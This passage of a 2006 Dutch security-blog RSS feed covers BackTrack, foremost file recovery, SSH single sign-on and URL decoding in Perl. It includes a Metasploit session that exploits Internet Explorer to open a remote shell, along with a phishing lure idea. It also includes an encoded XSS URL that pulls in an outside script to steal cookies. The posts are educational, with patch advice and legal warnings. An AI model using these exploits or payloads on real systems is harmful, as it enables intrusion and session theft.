Apart from booting backtrack from USB stick (or from cdrom) there is another very conveniant way of using this distro, and thats by running it inside &lt;a class=&#34;extlink&#34; href=&#34;http://www.vmware.com/download/server/&#34; target=&#34;_blank&#34;&gt;VMware Server&lt;/a&gt;. You can use vmware server for free, but you have to &lt;a class=&#34;extlink&#34; href=&#34;http://register.vmware.com/content/registration.html&#34; target=&#34;_blank&#34;&gt;register&lt;/a&gt;.&lt;br/&gt;
&lt;a class=&#34;extlink&#34; href=&#34;http://www.markwilson.co.uk/blog/2006/08/installing-vmware-server-on-fedora.htm&#34; target=&#34;_blank&#34;&gt;Here&lt;/a&gt; is a nice installation guide how to install vmware server on Fedora Core 5. After that you can just fire up vmware console and click together a new Linux machine.  In “virtual mchine settings” the cdrom device should point towards your backtrack iso and after that power on the machine. Click the button to switch to full-screen, login as root (password toor) and type startx. You can still switch back forth to your host window manager by using &lt;b&gt;CRTL-ALT-F7&lt;/b&gt; and &lt;b&gt;CTRL-ALT-F8&lt;/b&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&#34;extlink&#34; href=&#34;http://digg.com/submit?phase=2&amp;amp;url=https://www.oiepoie.nl/2006/12/20/bootable-security-distro-on-your-usb-stick/&amp;amp;title=bootable%20backtrack%20security%20distro%20on%20a%20USB%20stick&amp;amp;bodytext=Transform%20your%20laptop%20in%20a%20security%20auditor%20toolkit%20in%20a%20few%20seconds%20by%20booting%20a%20backtrack%20distribution%20from%20a%201GB%20USB%20stick&amp;amp;topic=security&#34; target=&#34;_blank&#34;&gt;Digg This!&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;N.B.&lt;br/&gt;
In most countries it’s only legal to use the auditing, scanning, and forensic tools on your own computer. Use at your own risk!&lt;/b&gt;&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>terughalen van verloren gewaande bestanden met Linux en foremost</title>
      <link>https://www.oiepoie.nl/2006/11/12/terughalen-van-verloren-gewaande-bestanden-met-linux-en-foremost/</link>
      <pubDate>Sun, 12 Nov 2006 14:53:20 +0100</pubDate>
      
      <guid>https://www.oiepoie.nl/2006/11/12/terughalen-van-verloren-gewaande-bestanden-met-linux-en-foremost/</guid>
      <description>&lt;p&gt;Voor iedereen die wat met computers doet is het bijna een bekend probleem, een kennis heeft een digitale camera en om een of andere reden zijn alle foto’s van zijn geheugenkaartje verdwenen, of je ze even terug wilt halen.&lt;br/&gt;
Met de juiste tools is dit vaak vrij gemakkelijk. Het kaartje is bijvoorbeeld geformatteerd en dan lijkt het leeg, maar gelukkig staan alle bestanden er nog gewoon op.&lt;br/&gt;
Soms komen ook de standaard tools er niet uit en dan zijn er voor Linux altijd nog een aantal speciale forensische programma’s die je kan proberen. Een daarvan is &lt;a class=&#34;extlink&#34; href=&#34;http://foremost.sourceforge.net&#34; target=&#34;_blank&#34;&gt;foremost&lt;/a&gt; een programma dat het medium in kwestie afscant op bekende headers, footers en data structuren en vervolgens de bijbehorende bestanden weer terughaalt. Foremost is ontwikkeld door &lt;a class=&#34;extlink&#34; href=&#34;http://www.dtic.mil/afosi/&#34; target=&#34;_blank&#34;&gt;Air Force Office of Special Investigations&lt;/a&gt; en &lt;a class=&#34;extlink&#34; href=&#34;http://cisr.nps.edu/&#34; target=&#34;blank&#34;&gt;The Center for Information Systems Security Studies and Research&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Normaliter staat op een opslagmedium zoals harddisk of smartcard een zogenaamde “File Allocation Table”, in deze FAT is te vinden welke bestanden er op het medium staan en waar ze te vinden zijn (vergelijk het met een kaartenbak). Als de FAT afwezig of corrupt is, kan het besturingssysteem geen bestanden meer vinden en biedt het meestal aan om het medium te formatteren zodat het weer bruikbaar wordt.&lt;br/&gt;
Foremost kijkt niet naar de FAT maar begint het medium byte voor byte te lezen en vergelijkt de informatie met bekende headers. Zo begint een jpg bestand bijvoorbeeld met:&lt;br/&gt;
&lt;b&gt;FF D8 FF&lt;/b&gt;&lt;br/&gt;
en eindigt het met:&lt;br/&gt;
&lt;b&gt;FF D9&lt;/b&gt;&lt;br/&gt;
Ook (bijna) alle andere bestanden hebben dit soort unieke headers. In Linux gebruikt b.v. het &lt;b&gt;file&lt;/b&gt; commando deze informatie om terug te geven wat voor soort bestand het is, dus zonder te kijken naar de extensie.&lt;/p&gt;
&lt;p&gt;Om het xD kaartje te kunnen uitlezen op mijn fedora core 5 laptop sloot ik een Medion USB2 16-card reader aan van de aldi. Helaas ging dat niet onmiddelijk goed, de blauwe leesled bleef maar knipperen en &lt;b&gt;dmesg | tail&lt;/b&gt; gaf foutmeldingen als:&lt;/p&gt;
&lt;pre&gt;
usb 1-7: new high speed USB device using ehci_hcd and address 11
usb 1-7: device descriptor read/all, error -71
&lt;/pre&gt;
&lt;p&gt;Dit lijkt een of andere bug te zijn is het USB2 subsysteem van linux. Onder Windows zou dit meteen einde oefening zijn, maar met Linux kan je b.v. het USB2 gedeelte uit de kernel verwijderen met:&lt;br/&gt;
&lt;b&gt;rmmod ehci_hcd&lt;/b&gt;&lt;br/&gt;
en dan komt het kaartje alsnog netjes via USB1 beschikbaar:&lt;/p&gt;
&lt;pre&gt;
[super@zorax ~]# fdisk -l /dev/sdd
&lt;p&gt;Disk /dev/sdd: 65 MB, 65536000 bytes
8 heads, 32 sectors/track, 500 cylinders
Units = cylinders of 256 * 512 = 131072 bytes&lt;/p&gt;
&lt;p&gt;Device Boot      Start         End      Blocks   Id  System
/dev/sdd1   *           1         500       63972+   1  FAT12
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;mounten wilde niet lukken (bekende melding:&lt;br/&gt;
&lt;i&gt;mount: wrong fs type, bad option, bad superblock on /dev/sdd1,&lt;/i&gt; )&lt;br/&gt;
dus heb ik eerst maar eens een kopie gemaakt op harddisk om alle info&lt;br/&gt;
veilig te stellen:&lt;/p&gt;
&lt;pre&gt;dd if=/dev/sdd1 of=m-xd-card.iso&lt;/pre&gt;
&lt;p&gt;Met: &lt;/p&gt;
&lt;pre&gt;hexview -C m-xd-card.iso | less&lt;/pre&gt;
&lt;p&gt;kan je een indruk krijgen of er nog wat te redden valt. Als je allemaal &lt;b&gt;00&lt;/b&gt; ziet dan is er niets meer van te maken. Of:&lt;/p&gt;
&lt;pre&gt;strings m-xd-card.iso | grep -i jpg&lt;/pre&gt;
&lt;p&gt;Foremost stond nog niet op mijn systeem, dus ik heb het eerst geinstalleerd met:&lt;/p&gt;
&lt;pre&gt;yum install foremost&lt;/pre&gt;
&lt;p&gt;en daarna was het een kwestie van:&lt;/p&gt;
&lt;pre&gt;foremost -t jpg m-xd-card.iso&lt;/pre&gt;
&lt;p&gt;en alle jpg plaatjes kwamen boven water in de directory output/jpg&lt;/p&gt;
&lt;pre&gt;
[super@zorax ~]# ls output/jpg/
00000105.jpg  00006729.jpg  00013225.jpg  00018665.jpg  00024073.jpg  00029737.jpg  00035113.jpg
00001449.jpg  00008041.jpg  00014601.jpg  00019881.jpg  00025417.jpg  00031081.jpg  00036457.jpg
00002857.jpg  00010665.jpg  00016009.jpg  00021321.jpg  00026857.jpg  00032425.jpg  00037737.jpg
00005609.jpg  00012041.jpg  00017449.jpg  00022729.jpg  00028297.jpg  00033833.jpg
&lt;/pre&gt;
</description>
    </item>
    
    <item>
      <title>hacken met metasploit</title>
      <link>https://www.oiepoie.nl/2006/10/18/hacken-met-metasploit/</link>
      <pubDate>Wed, 18 Oct 2006 20:43:48 +0200</pubDate>
      
      <guid>https://www.oiepoie.nl/2006/10/18/hacken-met-metasploit/</guid>
      <description>&lt;p&gt;Internet Explorer heeft nogal een historie van beveiligingslekken. Op het moment van schrijven zijn er nog 19 lekken waarvoor Microsoft nog geen patch heeft uitgebracht (zie &lt;a class=&#34;extlink&#34; href=&#34;http://secunia.com/product/11/&#34; target=&#34;_blank&#34;&gt;Secunia&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;Het is opvallend dat dit soort informatie mensen er niet van weerhoudt om de browser te gebruiken (er zijn &lt;a href=&#34;https://www.oiepoie.nl/firefox&#34;&gt;veiligere alternatieven&lt;/a&gt;), de algemene tendens is dat het wel niet zo’n vaart zal lopen. Pas als je laat zien hoe makkelijk het is om misbruik te maken van een van die beveiligingslekken om een computer binnen te dringen en complete toegang te krijgen schrikt men. Dus toen onlangs een nieuwe 0-Day beveiligingslek voor Internet Explorer aan het licht kwam besloot ik om met mijn eigen computers een te kijken hoe makkelijk dit te gebruiken was om de Windows machine binnen te dringen. Ik heb hierbij gebruik gemaakt van het &lt;b&gt;metasploit&lt;/b&gt; framework.&lt;/p&gt;
&lt;pre&gt;
[ ~/metasploit]$ ./msfconsole

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|

       =[ msf v3.0-beta-dev
+ -- --=[ 104 exploits - 99 payloads
+ -- --=[ 17 encoders - 4 nops
       =[ 13 aux

msf &amp;gt; use windows/browser/webview_setslice
msf exploit(webview_setslice) &amp;gt; set PAYLOAD windows/shell/bind_tcp
PAYLOAD =&amp;gt; windows/shell/bind_tcp
msf exploit(webview_setslice) &amp;gt; exploit
[*] Started bind handler
[*] Using URL: http://10.10.10.6:8080/kYcv56MJDE3509LmnJK
[*] Server started.
[*] Exploit running as background job.
msf exploit(webview_setslice) &amp;gt;
&lt;/pre&gt;
&lt;p&gt;Nu ga ik naar mijn Windows PC en open met IE de URL van hierboven:&lt;br/&gt;
http://10.10.10.6:8080/kYcv56MJDE3509LmnJK&lt;br/&gt;
IE lijkt nu te hangen op de PC alsof een trage pagina wordt geladen&lt;br/&gt;
in metasploit zie ik:&lt;/p&gt;
&lt;pre&gt;
msf exploit(webview_setslice) &amp;gt; [*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.10.10.6:34745 -&amp;gt; 10.10.10.99:4444)
&lt;p&gt;msf exploit(webview_setslice) &amp;gt; sessions -l&lt;/p&gt;
&lt;h1 id=&#34;active-sessions&#34;&gt;Active sessions&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;Id  Description    Tunnel
--  -----------    ------
1   Command shell  10.10.10.6:34745 -&amp;amp;gt; 10.10.10.99:4444
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;msf exploit(webview_setslice) &amp;gt; sessions -i 1
[*] Starting interaction with 1&amp;hellip;&lt;/p&gt;
&lt;p&gt;Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.&lt;/p&gt;
&lt;p&gt;C:\Documents and Settings\beekman\Desktop&amp;gt;cd &lt;br&gt;
cd \&lt;/p&gt;
&lt;p&gt;C:&amp;amp;gt;netstat -an
netstat -an&lt;/p&gt;
&lt;p&gt;Active Connections&lt;/p&gt;
&lt;p&gt;Proto  Local Address          Foreign Address        State
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
TCP    10.10.10.99:4444     10.10.10.6:34745   ESTABLISHED&lt;/p&gt;
&lt;p&gt;C:&amp;amp;gt; ^C
Abort session 1? [y/N]  y&lt;/p&gt;
&lt;p&gt;[*] Command shell session 1 closed.
msf exploit(webview_setslice) &amp;gt;
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;De payload bind_tcp is slechts een van de vele mogelijke payloads die je kan gebruiken, er zitten ook payloads bij die je een VNC connectie geven zodat je grafisch kan meekijken wat de gebruiker allemaal aan het doen is.&lt;/p&gt;
&lt;p&gt;Je moet met deze specifieke exploit de gebruiker natuurlijk nog wel zo ver krijgen dat hij op jou URL klikt maar met een beetje social engineering hoeft dat geen probleem te zijn.&lt;br/&gt;
B.v. je stelt een e-mailtje op alsof je een nieuwe online muziekwinkel bent en de eerste 100 mensen die de nieuwe winkel bezoeken krijgen gratis een iPod, u kunt onze winkel vinden via onderstaande link.&lt;/p&gt;
&lt;p&gt;Je kan jezelf beschermen tegen dit specifieke lek door de juiste &lt;a class=&#34;extlink&#34; href=&#34;http://www.microsoft.com/technet/security/bulletin/ms06-057.mspx&#34; target=&#34;blank&#34;&gt;Microsoft patch&lt;/a&gt; te installeren. Behalve dat is het ook slim om over te stappen naar een veiliger browser zoals b.v. &lt;a href=&#34;https://www.oiepoie.nl/firefox&#34;&gt;firefox&lt;/a&gt;. &lt;/p&gt;
&lt;p&gt;Andere middelen van beveiliging die kunnen helpen is het hebben van een goed en bijgewerkte AntiVirus op je computer. Bovenstaande exploit werd bijvoorbeeld door Symantec tegengehouden.&lt;br/&gt;
Als je een moderne CPU in je computer hebt is het zeker ook aan te raden om &lt;b&gt;Data Execution Prevention&lt;/b&gt; kortweg &lt;b&gt;DEP&lt;/b&gt; in te schakelen. Dit kan als volgt:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Klik op Start, klik op Uitvoeren, typ sysdm.cpl en klik op OK.
&lt;/li&gt;
&lt;li&gt;Open het tabblad Geavanceerd en klik onder Prestaties op Instellingen.
&lt;/li&gt;
&lt;li&gt;Gebruik op het tabblad Preventie van gegevensuitvoering (DEP) een van de volgende procedures:
&lt;ul&gt;
&lt;li&gt;Klik op DEP alleen voor kritieke Windows-programma’s en -services inschakelen als u het OptIn-beleid wilt selecteren.
&lt;/li&gt;
&lt;li&gt;Klik op DEP voor alle programma’s en services inschakelen, behalve voor de hieronder geselecteerde als u het OptOut-beleid wilt selecteren. Klik vervolgens op Toevoegen om de programma’s toe te voegen waarvoor u de DEP-functie niet wilt gebruiken.
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Klik tweemaal op OK.
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;b&gt;N.B.&lt;/b&gt;&lt;br/&gt;
Ik heb bovenstaande tests op mijn eigen computers uitgevoerd. Het inbreken op andermans computers is strafbaar volgens de Nederlandse Wet. Zelfs het voorhanden hebben van programma’s of andere middelen om te hacken is een strafbaar feit en kan bestraft worden met een celstraf van maximaal 1 jaar (zie: &lt;a class=&#34;extlink&#34; href=&#34;http://www.iusmentis.com/beveiliging/hacken/computercriminaliteit/computervredebreuk/&#34; target=&#34;_blank&#34;&gt;uitleg computervredebreuk&lt;/a&gt; ).&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>gratis boek “Security Engineering”</title>
      <link>https://www.oiepoie.nl/2006/08/27/gratis-boek-security-engineering/</link>
      <pubDate>Sun, 27 Aug 2006 22:41:02 +0200</pubDate>
      
      <guid>https://www.oiepoie.nl/2006/08/27/gratis-boek-security-engineering/</guid>
      <description>&lt;p&gt;&lt;a class=&#34;extlink&#34; href=&#34;http://www.cl.cam.ac.uk/~rja14/book.html&#34; target=&#34;_new&#34;&gt;Security Engineering – the Book&lt;/a&gt; geschreven door &lt;a class=&#34;extlink&#34; href=&#34;http://www.cl.cam.ac.uk/~rja14/&#34; target=&#34;_new&#34;&gt;Ross Anderson&lt;/a&gt;.&lt;br/&gt;
Het is al een wat ouder boek (2001) maar nog steeds de moeite waard om te lezen. De auteur en uitgever hopen op deze manier nog nieuwe lezers te trekken en dat de mensen die het de moeite waard vinden alsnog een papieren exemplaar kopen omdat een boek nu eenmaal makkelijker leest dan van het scherm of vanuit een 4-rings map 😉&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>gratis boek “Security Engineering”</title>
      <link>https://www.oiepoie.nl/2006/08/27/gratis-boek-security-engineering/</link>
      <pubDate>Sun, 27 Aug 2006 22:41:02 +0200</pubDate>
      
      <guid>https://www.oiepoie.nl/2006/08/27/gratis-boek-security-engineering/</guid>
      <description>&lt;p&gt;&lt;a class=&#34;extlink&#34; href=&#34;http://www.cl.cam.ac.uk/~rja14/book.html&#34; target=&#34;_new&#34;&gt;Security Engineering – the Book&lt;/a&gt; geschreven door &lt;a class=&#34;extlink&#34; href=&#34;http://www.cl.cam.ac.uk/~rja14/&#34; target=&#34;_new&#34;&gt;Ross Anderson&lt;/a&gt;.&lt;br/&gt;
Het is al een wat ouder boek (2001) maar nog steeds de moeite waard om te lezen. De auteur en uitgever hopen op deze manier nog nieuwe lezers te trekken en dat de mensen die het de moeite waard vinden alsnog een papieren exemplaar kopen omdat een boek nu eenmaal makkelijker leest dan van het scherm of vanuit een 4-rings map 😉&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>URL coderen en decoderen met perl</title>
      <link>https://www.oiepoie.nl/2006/06/24/url-coderen-en-decoderen-met-perl/</link>
      <pubDate>Sat, 24 Jun 2006 14:59:53 +0200</pubDate>
      
      <guid>https://www.oiepoie.nl/2006/06/24/url-coderen-en-decoderen-met-perl/</guid>
      <description>&lt;p&gt;Regelmatig zie je &lt;a class=&#34;extlink&#34; href=&#34;http://nl.wikipedia.org/wiki/Url&#34; target=&#34;_new&#34;&gt;URL’s&lt;/a&gt; met in plaats van het &lt;a class=&#34;extlink&#34; href=&#34;http://nl.wikipedia.org/wiki/ASCII_%28tekenset%29&#34; target=&#34;_new&#34;&gt;ASCII&lt;/a&gt; karakter een gecodeerde versie hiervan. De meest voorkomende is waarschijnlijk &lt;b&gt;%20&lt;/b&gt; oftewel spatie, maar ook &lt;b&gt;%2F&lt;/b&gt; (forward slash: /) zie je regelmatig in URL’s.&lt;br/&gt;
De reden hiervoor is dat deze karakter vaak een speciale betekenins hebben voor de computer waarop je browser draait en door ze te vervangen door de gecodeerde weergaven kan de browser ze doorgeven naar de website en komt de goede informatie terug.&lt;/p&gt;
&lt;p&gt;Het wordt wat vervelender als je een URL (bijvoorbeeld via de e-mail) toegestuurd krijgt die alleen maar is opgebouwd uit dit soort tekens. De website aan het begin van de URL mag dan wel vertrouwd lijken, maar het zou kunnen dat je door middel van een &lt;a class=&#34;extlink&#34; href=&#34;http://nl.wikipedia.org/wiki/Cross-site_scripting&#34; target=&#34;_new&#34;&gt;Cross Site Scripting&lt;/a&gt;  aanval ineens het cookie weggeeft aan een aanvaller (de verzender van de URL) die daardoor b.v. je sessie waarmee je bent ingelogd op je webmail kan overnemen.&lt;/p&gt;
&lt;p&gt;Zo’n URL kan er bijvoorbeeld zo uitzien:&lt;/p&gt;
&lt;pre&gt;
http://www.blabla.com/search.pl?q=%22%3E%3C%73%63%72%69%70%74%2B%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%6F%69%65%70%6F%69%65%2E%6E%6C%2F%78%73%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
&lt;/pre&gt;
&lt;p&gt;Met &lt;a class=&#34;extlink&#34; href=&#34;http://nl.wikipedia.org/wiki/Perl_%28programmeertaal%29&#34;&gt;perl&lt;/a&gt; kan je dit makkelijk weer leesbaar maken, dit gaat als volgt:&lt;/p&gt;
&lt;pre&gt;
echo \
&#34;http://www.blabla.com/search.pl?q=%67%65%76%61%61%72%6C%69%6A%6B%65%20%58%53%53%20%61%61%6E%76%61%6C%20%6D%65%74%20%6A%61%76%61%73%63%72%69%70%74&#34;\
| perl  -pe &#39;s/\%([A-Fa-f0-9]{2})/pack(&#39;C&#39;, hex($1))/seg;&#39;
&lt;b&gt;output: http://www.blabla.com/search.pl?q=gevaarlijke XSS aanval met javascript
&lt;/b&gt;&lt;/pre&gt;
&lt;p&gt;Als je zelf wilt experimenteren met dit soort URL’s dan kan je ze bouwen op de volgende manier:&lt;/p&gt;
&lt;pre&gt;
echo &#34;de groeten van Ewald&#34; \
| perl -pe &#39;chomp ; s/(.)/sprintf(&#34;%%%02X&#34;, ord($1))/seg;&#39;
&lt;b&gt;output: &lt;/b&gt;%64%65%20%67%72%6F%65%74%65%6E%20%76%61%6E%20E%77%61%6C%64
&lt;/pre&gt;
</description>
    </item>
    
    <item>
      <title>Single SignOn onder Linux</title>
      <link>https://www.oiepoie.nl/2006/04/02/single-signon-onder-linux/</link>
      <pubDate>Sun, 02 Apr 2006 15:04:20 +0200</pubDate>
      
      <guid>https://www.oiepoie.nl/2006/04/02/single-signon-onder-linux/</guid>
      <description>&lt;p&gt;Er wordt in de bedrijfswereld vrij veel over gesproken, &lt;b&gt;Single SignOn&lt;/b&gt; oftewel eenmalig inloggen. Het idee is dat je dagelijks toegang moet krijgen tot diverse systemen en informatiebronnen, bijvoorbeeld je e-mail, de agenda, en meestal nog een aantal servers. Als die systemen hebben een eigen username/password systeem en het is aan jou om die allemaal te onthouden. Vaak stellen mensen initieel overal hetzelfde wachtwoord in (de username of gebruikersnaam wordt vaak uitgereikt door de systeembeheerder en kan je zelf niet bepalen). Maar soms moet je dan bij het ene systeem om de 3 maanden je wachtwoord veranderen terwijl dit op een ander systeem nooit meer hoeft. Bovendien wordt je van dat eindeloos inloggen ook niet blij.&lt;/p&gt;
&lt;p&gt;Dus wat willen we: &lt;b&gt;Single SignOn&lt;/b&gt;, ‘s ochtends eenmaal inloggen en dat geldt dan voor alle systemen totdat een bepaald tijd verstreken is en je opnieuw moet inloggen.&lt;/p&gt;
&lt;p&gt;Onder Linux is dit al erg lang mogelijk. Het beste systeem hiervoor is waarschijnlijk &lt;a class=&#34;extlink&#34; href=&#34;http://nl.wikipedia.org/wiki/Kerberos_%28protocol%29&#34; target=&#34;_new&#34;&gt;Kerberos&lt;/a&gt; vernoemd naar de driekoppige hellehond uit de griekse mythologie. Voor thuisgebruik is Kerberos wat overdreven en kan je min of meer hetzelfde effect bereiken met &lt;a class=&#34;extlink&#34; href=&#34;http://nl.wikipedia.org/wiki/Ssh&#34; target=&#34;_new&#34;&gt;ssh&lt;/a&gt; (Secure Shell) en het bijbehorende ssh-agent.&lt;br/&gt;
Ssh is een bijzonder krachtig stuk gereedschap, op het eerste gezicht lijkt het misschien alleen een veilige vervanging voor telnet, maar met de juiste commandline opties kan je het gebruiken als vpn-client (door tunnels te definieren) en met scp (secure copy) kan je ftp vervangen.&lt;/p&gt;
&lt;p&gt;Ssh login kan werken met username/password authenticatie (met het verschil t.o.v. telnet dat de gegevens niet leesbaar over het netwerk worden gestransporteerd, maar worden beschermd door encryptie). Maar het ondersteund ook &lt;a class=&#34;extlink&#34; href=&#34;http://nl.wikipedia.org/wiki/PKI&#34; target=&#34;_new&#34;&gt;PKI&lt;/a&gt;. PKI staat voor Public Key Infrastructure en werkt met een publieke en een privé sleutel die bij elkaar horen. De publieke sleutel mag iedereen weten en de bijbehorende privé sleutel moet geheim blijven. Als iemand iets versleuteld met jou publieke sleutel, dan kan jij als bezitter van de bijbehorende privé sleutel als enige het bestand weer leesbaar maken. Als jij onder een bericht (b.v. een e-mail) een digitale handtekening zet met je privé sleutel, dan kan iedereen met jou publieke sleutel valideren dat de handtekening ook echt van jou afkomstig is.&lt;/p&gt;
&lt;p&gt;Om ssh in combinatie met PKI te gebruiken moet je eerst een sleutelpaar genereren, dat gaat als volgt:&lt;/p&gt;
&lt;pre&gt;
[~]$ ssh-keygen -t dsa
Generating public/private dsa key pair.
Enter passphrase (empty for no passphrase): **********
Enter same passphrase again: **********
Your identification has been saved in /home/beekman/.ssh/id_dsa.
Your public key has been saved in /home/beekman/.ssh/id_dsa.pub.
The key fingerprint is: 23:c5:9c:7c:79:7c:f2:c9:3f:d7:63:53:79:0d:8a:b3 ewald@oiepoie.nl
&lt;p&gt;&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;Nu moeten we ervoor zorgen dat je publieke sleutel terecht komt op alle systemen waarop je voortaan zonder extra inloggen wilt kunnen werken. &lt;b&gt;N.B.&lt;/b&gt; je moet al een account hebben op deze systemen, het enige wat we willen bereiken is username/password authenticatie vervangen door onze single signon.&lt;/p&gt;
&lt;p&gt;Om te publieke sleutel op de andere computer neer te zetten gebruien we nogmaals ssh om de verbinding op te bouwen. Dit kan met een “oneliner”, alleen moeten we nu nog even met ons wachtwoord authenticeren:&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
[beekman@pandora ~]&amp;gt; cat ~/.ssh/id_dsa.pub | ssh beekman@vortex &#39;cat - &amp;gt;&amp;gt; ~/.ssh/authorized_keys&#39;
beekman@vortex&#39;s password:
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;We kunnen nu al checken of PKI authenticatie via ssh werkt, het vraagt nu nog wel om een wachtwoord omdat je privé sleutel is beschermd met een wachtwoord (anders zou bijvoorbeeld de root gebruiker op je huidige computer er misbruik van kunnen maken, want die kan immers bij ieder bestand wat op de computer aanwezig is).&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
[beekman@pandora ~]&amp;gt; ssh beekman@vortex
Enter passphrase for key &#39;/home/beekman/.ssh/id_dsa&#39;:
Last login: Thu Jan 12 20:22:16 2006 from 18-196.surfsnel.dsl.internl.net
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;De laatse stap is om het programma ssh-agent altijd op te starten als je inlogt op het systeem waar vandaan je werkt en die toegang te geven tot je privé sleutel. Als er vervolgens gevraagd wordt om deze sleutel omdat je op een andere computer wilt inloggen of omdat je een bestand wilt kopieeren met scp dan zal ssh-agent dit voor je afvangen.&lt;br/&gt;
Het opstarten van ssh-agent gaat vanuit het &lt;b&gt;.login&lt;/b&gt; bestand dat eenmalig uitgevoerd wordt als je voor het eerst inlogd op je computer. Dit is de keer dat je je wachtwoord moet intypen om je privésleutel vrij te geven voor ssh-agent. De scripts hier werken voor de csh en tcsh shells.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&lt;br/&gt;
[beekman@pandora ~]&amp;gt; cat .login&lt;br/&gt;
&lt;/code&gt;&lt;br/&gt;
[code]&lt;br/&gt;
set sshAgent=/usr/bin/ssh-agent&lt;br/&gt;
set sshAgentArgs=”-c”&lt;br/&gt;
set tmpFile=exportAgentEnv&lt;br/&gt;
if ( -x “$sshAgent” ) then&lt;br/&gt;
      if ( ! $?SSH_AUTH_SOCK ) then&lt;br/&gt;
        $sshAgent $sshAgentArgs | head -2 &amp;gt; $tmpFile&lt;br/&gt;
        source $tmpFile&lt;br/&gt;
        rm $tmpFile&lt;br/&gt;
        echo “ssh agent started [${SSH_AGENT_PID}]”&lt;br/&gt;
        ssh-add&lt;br/&gt;
      endif&lt;br/&gt;
endif&lt;br/&gt;
[/code]&lt;/p&gt;
&lt;p&gt;Met een klein &lt;b&gt;.logout&lt;/b&gt; scriptje zorg je dat ssh-agent ook weer netjes afgesloten wordt bij het uitloggen:&lt;br/&gt;
&lt;code&gt;&lt;br/&gt;
[beekman@pandora ~]&amp;gt; cat .logout&lt;br/&gt;
&lt;/code&gt;&lt;br/&gt;
[code]&lt;br/&gt;
if ( $?SSH_AGENT_PID ) then&lt;br/&gt;
      echo “killing ssh agent [${SSH_AGENT_PID}]”&lt;br/&gt;
      ssh-add -D&lt;br/&gt;
      kill $SSH_AGENT_PID&lt;br/&gt;
      unset SSH_AGENT_PID&lt;br/&gt;
      unset SSH_AUTH_SOCK&lt;br/&gt;
endif&lt;br/&gt;
[/code]&lt;/p&gt;
&lt;p&gt;Nu is het een kwestie van uitloggen en inloggen en je wachtwoord ingeven.&lt;/p&gt;
&lt;p&gt;Even checken of ssh-agent ook echt draait:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
[beekman@pandora ~]&amp;gt; ps -f | grep ssh-agent
beekman   5863  5259  0 13:56 pts/1    00:00:00 grep ssh-agent
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;En het gebruik testen, bijvoorbeeld door wat heen en weer te kopieeren (pandora is mijn laptop waarop ik ben ingelogd, vortex is de server die ver weg staat):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
[beekman@pandora ~]&amp;gt; touch test.txt
[beekman@pandora ~]&amp;gt; scp test.txt vortex:
test.txt                          100%    0     0.0KB/s   00:00
[beekman@pandora ~]&amp;gt; ssh vortex &#34;ls -l test.txt&#34;
-rw-r--r--  1 beekman beekman 0 Apr  2 14:46 test.txt
[beekman@pandora ~]&amp;gt; rm -f test.txt
[beekman@pandora ~]&amp;gt; scp vortex:test.txt .
test.txt                          100%    0     0.0KB/s   00:00
[beekman@pandora ~]&amp;gt; ls -l test.txt
-rw-r--r--  1 beekman beekman 0 2006-04-02 13:59 test.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;en natuurlijk door in te loggen:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
[beekman@pandora ~]&amp;gt; ssh vortex
Last login: Sun Apr  2 13:24:51 2006 from 18-196.surfsnel.dsl.internl.net
[beekman@vortex ~]&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;b&gt;Problemen?&lt;/b&gt;&lt;br/&gt;
Default staat in de systeemwijde instellingen voor sshd (de secure shell daemon) Public Key Authentication aan. Het kan natuurlijk zijn dat de systeembeheerder dit heeft uitgezet. Je kan met ssh erg goed zien wat er mis gaat als er problemen zijn door de optie &lt;b&gt;-v&lt;/b&gt; mee te geven. Ssh laat dan stap voor stap zien wat er gebeurd. Je kan meerdere keren &lt;b&gt;-v&lt;/b&gt; achter elkaar zetten om nog meer info te zien (tot drie keer aan toe.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Windows&lt;/b&gt;&lt;br/&gt;
De beste windows ssh client is &lt;a class=&#34;extlink&#34; href=&#34;http://www.chiark.greenend.org.uk/~sgtatham/putty/&#34; target=&#34;_new&#34;&gt;Putty&lt;/a&gt;.&lt;br/&gt;
Als je veel heen en weer wilt kopieeren dan is &lt;a class=&#34;extlink&#34; href=&#34;http://winscp.net/eng/index.php&#34; target=&#34;_new&#34;&gt;winscp&lt;/a&gt; een aanrader. Beide zijn gratis te gebruiken.&lt;/p&gt;
</description>
    </item>
    
  </channel>
</rss>
